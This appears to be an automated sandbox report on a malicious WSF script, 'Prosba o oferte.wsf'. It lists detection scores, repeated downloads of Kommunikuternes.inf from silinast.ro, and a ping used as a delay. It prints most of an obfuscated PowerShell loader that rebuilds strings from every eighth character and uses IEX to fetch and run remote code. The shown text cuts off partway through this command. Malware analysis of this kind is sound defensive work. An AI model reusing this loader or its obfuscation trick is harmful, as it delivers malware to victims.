Source: silinast.ro |
Virustotal: Detection: 10% |
Perma Link |
Source: http://silinast.ro |
Virustotal: Detection: 10% |
Perma Link |
Source: http://silinast.ro/Kommunikuternes.inf |
Virustotal: Detection: 9% |
Perma Link |
Source: Prosba o oferte.wsf |
Virustotal: Detection: 8% |
Perma Link |
Source: Prosba o oferte.wsf |
ReversingLabs: Detection: 13% |
Source: Submited Sample |
Integrated Neural Analysis Model: Matched 98.7% probability |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.2138100600.000002CC9D367000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ion.pdb source: powershell.exe, 00000004.00000002.2136856117.000002CC9D1CD000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: silinast.roConnection: Keep-Alive |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /Kommunikuternes.inf HTTP/1.1Host: silinast.roConnection: Keep-Alive |
Source: global traffic |
DNS traffic detected: DNS query: 6777.6777.6777.677e |
Source: global traffic |
DNS traffic detected: DNS query: silinast.ro |
Source: powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000004.00000002.2103502610.000002CC84C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.4214260996.0000000004551000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000004.00000002.2103502610.000002CC86B70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2103502610.000002CC86A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2103502610.000002CC866B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://silinast.ro |
Source: powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://silinast.ro/Kommunikuternes.infP |
Source: powershell.exe, 00000009.00000002.4214260996.00000000046A9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://silinast.ro/Kommunikuternes.infXR$lX |
Source: powershell.exe, 00000004.00000002.2103502610.000002CC86B70000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://silinast.roXR |
Source: powershell.exe, 00000004.00000002.2103502610.000002CC86A09000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://silinast.roXh |
Source: powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000004.00000002.2103502610.000002CC84C81000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000009.00000002.4214260996.0000000004551000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000004.00000002.2103502610.000002CC84EA8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000004.00000002.2103502610.000002CC8590B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: amsi64_7468.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_7936.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7468, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7936, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677e |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHet |